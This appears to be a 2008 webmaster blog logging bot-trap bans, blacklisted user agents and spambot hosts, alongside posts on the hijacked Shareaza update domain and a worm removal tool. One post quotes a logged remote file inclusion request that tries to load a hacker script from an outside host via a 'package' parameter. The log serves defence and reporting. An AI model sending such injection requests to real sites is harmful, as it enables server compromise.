Feb 29, 2008

new bot trap listings

Why are all of these ips falling into bot traps?
Looks like a bot net thats trying to spider web sites.,2008-02-24,basetower.com,AB,BAN,Fell in bot trap,2008-02-28,hestia.produhost.net,AB,BAN,Fell in bot trap,2008-02-28,riad.pk.edu.pl,AB,BAN,Fell in bot trap,2008-02-28,son.s-online.at,AB,BAN,Fell in bot trap,2008-02-28,i-dreams.net,AB,BAN,Fell in bot trap,2008-02-28,-,AB,BAN,Fell in bot trap,2008-02-28,sd-301.dedibox.fr,AB,BAN,Fell in bot trap,2008-02-29,dman.com,AB,BAN,Fell in bot trap,2008-02-29,infurma.es,AB,BAN,Fell in bot trap,2008-02-29,kkadam.xs4all.nl,AB,BAN,Fell in bot trap,2008-02-29,-,AB,BAN,Fell in bot trap

Feb 28, 2008

"Fake Shareaza" takes over updates from the real thing

Posted by Erica George Wed, 20 Feb 2008 21:06:00 GMT

Users of the popular filesharing application Shareaza are reporting that a competitor has taken over a former Shareaza website and is using it to overwrite the real Shareaza application with an impostor posing as an update.

How is that possible? According to Sarah Pike at AppScout:

Someone took great advantage of old code in Shareaza, which checks for updates with, among other URLs, www.shareaza.com, which another company has now registered. So when the real Shareaza does its regular thing and checks in for updates, it offers to download the fake Shareaza to replace itself.
For software producers, this is an important wake-up call. If your software automatically checks a website for updates, you’re responsible for what that website delivers to your users, so it’s important to maintain control of that site.

Users shouldn’t see the Shareaza switch as a reason to forgo software updates. As the AppScout post discusses, in this kind of social engineering scam there are often warning signs that something may not be quite right. Be sure you read dialog boxes carefully before clicking OK and agreeing to anything, including an update. And do your best to stay informed about the software you use by signing up for alerts from the distributor, or regularly checking for news.


We warned you about this domain being hyjacked a while ago. You are also warned that the software installs some bots on your system so if you dio download this imposter you need to scan your system for adaware.

Get the real program at its new location

Feb 20, 2008

ns.allwatch.us spambot

400 Prohibited header 'Proxy-Connection' present
Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461) ns.allwatch.us

No trafic should be comming from this domain its a RU watch site so its banned.

porting Bad Behavior to any PHP script

If you are having trouble porting Bad Behavior to a PHP script
All you have to do is use the scripts in MM Autoban and the work is done for you. Just install BB under the MM autoban directory. You dont have to use MMAutoban you can just call BB.

Feb 19, 2008

More Botnets found

403 User-Agent was found on blacklist
Agent: libwww-perl/5.808 pouch.kangaroopartners.com
Agent: libwww-perl/5.808 mail.zoiig.com
Agent: libwww-perl/5.808 greenlifestyletoday.com
Agent: libwww-perl/5.805 creativestation.co.uk
Agent: libwww-perl/5.808 orbitdesignworks.com
Agent: libwww-perl/5.808 alef.northtrex.com
Agent: libwww-perl/5.79 familyguy.ca
Agent: libwww-perl/5.803 server1.opennms.org
Agent: libwww-perl/5.79 newinst.greenbaumstaging.com
Agent: libwww-perl/5.79 ns3.ctm-it.com
Agent: libwww-perl/5.808 64-141-102-13.static.dns77.com
Agent: libwww-perl/5.805 no-dns-yet.demon.co.uk
Agent: libwww-perl/5.808 72-29-78-145.static.dimenoc.com
Agent: libwww-perl/5.805 s15289207.onlinehome-server.info
Agent: libwww-perl/5.808 drive28.123servers.com
Agent: libwww-perl/5.808
Agent: libwww-perl/5.805 master.herrotto.de

Hacker scripts on amyru.h18.ru

This joker thought I might be using a filname to load a text file so he tried to load his hacker file. this is not how I program tho so it would do nothing even if his useragent had not been banned.

package=http://amyru.h18.ru/images/cs.txt? GET HTTP/1.1
Agent: wget/1.1 (compatible; i486; linux; redhat7.3)

h18.ru should be added to the hackers file.

The host has shutdown amyru.h18.ru
Access you is forbidden cannot obtain access to site amyru.h18.ru of t.k its owner it allowed the crude violation of the conditions of free hosting and was deprived of the right of access. All questions request to direct to hs@agava.com

Feb 14, 2008

MM Autoban

v3.8 has been released this includes all the bug fixes and some minor fixes.

w32.nopir.c-p2p Virus Removal tool

Since I released this tool back in 06 118 people have downloaded it to remove this nasty virus. Once you get it it erases all your music files and then prevents you from booting your system.
Image Hosted by ImageShack.us

Download this program w32.nopir.c-p2p-worm-fix-v2.zip On another computer. Copy it to your computer. Likely will have to use a cd or a disk. Reboot your computer following docs and run the script. It will remove the hack files and the hooks that load them. You should then be able to reboot to windows. This was writen for XP it is unknown how the virus will work on Vista.

Feb 6, 2008

robot sipost.de

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) sipost.de

Not sure what this bot is trying to do. It fell into a bot trap.

A visit to sipost.de tells me access forbiden.

So sipost.de is now banned.

dude.websupport.sk is a robot

Agent: -NO AGENT- dude.websupport.sk

Not sure what this one is. But websupport.sk is now banned

NASA Web Robot? host.jsc.nasa.gov

403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT) host.jsc.nasa.gov

Whats this is NASA running a robot?


Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) maryland.networkphantom.net

Another bot. Fell into a bot trap and then tried to post some spam urls after it was banned.

gts2.westmaster.com spambot

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) gts2.westmaster.com

This bot came in and fell in a bot trap. It then went about trying to post spam urls after it had been banned.